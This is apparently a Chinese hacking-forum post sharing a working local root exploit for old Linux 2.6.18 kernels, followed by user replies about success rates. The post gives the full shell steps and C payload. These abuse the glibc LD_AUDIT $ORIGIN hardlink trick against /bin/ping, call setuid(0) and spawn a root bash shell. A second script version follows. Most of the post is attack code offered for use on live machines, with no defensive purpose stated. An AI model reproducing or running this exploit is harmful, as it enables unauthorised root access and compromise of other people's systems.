exp,对部分2.6.18*的有用
应该是2010年出的吧,可能有部分同学那时没有注意到,此方法可以提低版本的2.6.18*.
2012就不用试了,2011的有时可以成功payload.c当不能gcc时,解压XXX,扔上去试下
2012就不用试了,2011的有时可以成功
mkdir /tmp/exploit
ln /bin/ping /tmp/exploit/target
exec 3< /tmp/exploit/target
rm -rf /tmp/exploit/
gcc -w -fPIC -shared -o /tmp/exploit payload.c
LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
void __attribute__((constructor)) init()
{
setuid(0);
system("/bin/bash");
}
#!/bin/sh
unset LD_AUDIT
rm -r -f /var/tmp/exploit
mkdir /var/tmp/exploit
ln /bin/ping /var/tmp/exploit/target
exec 3< /var/tmp/exploit/target
ls -l /proc/$$/fd/3
rm -rf /var/tmp/exploit
ls -l /proc/$$/fd/3
cp xxx /var/tmp/exploit
LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
unset LD_AUDIT
评论22次
有用收藏
LINUX 2.6.18-53.el5EXP http://www.xocoder.com/index.php/archives/20 相比而言,这个EXP的成功率会更高点。
感觉这个还是运气成分比较大些,不过在无路可走时试试
7分运气,
完全是碰运气。
有空 测试一下才行 谢谢
linux的 一直是心头伤啊 不会弄。。。
有一些成功了。
好像是exploit-db上的那个。
收下以备不时之需
留着备用吧,感觉看运气的居多啊
2.6.18 274 308 都无效
测试了一下,成功率40%吧。
2.6.18旧版本差不多一半半的成功率。感谢。去试楼主这个方法。
aix小机的可以用么
请问xxx是 在32位上编译的 还是x64编译的?
不了解
备用着
有空测试一下 收藏了